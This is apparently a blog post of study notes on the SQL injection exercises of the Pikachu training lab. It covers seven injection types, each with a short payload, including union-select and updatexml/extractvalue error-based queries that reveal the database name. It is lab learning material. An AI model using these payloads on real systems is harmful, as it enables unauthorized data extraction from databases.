pickachu漏洞學習---------sql注入篇

1.數字型注入(POST):

 

源碼

payload: -1' union select 1,2 #

 

2.字符型注入(GET):

源碼:

payload: 0'union select 1,database() #

 

3.搜索型注入

源碼:

payload: 0' union select 1,2,database() #

 

4.XX型注入:

源碼:

payload:0')union select 2,database() #

 

5.insert/update注入:

登陸框:

註冊框:

 

 註冊頁面的源碼:

 修改信息界面:

 修改信息源碼:

payload:1'or updatexml(1,concat(0x7e,(database())),0) or '

 

6.delete注入:

源碼:

payload: 110 or extractvalue(1,concat(0x5e24,(database()))) or ''

 

 

7.http headr 頭部注入:

賬號:admin  密碼:123456

源碼:

payload:1' or updatexml(1,concat(0x7e,(database())),0) or '

抓包修改:

 

 

 

 

 

 

 

 

 

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章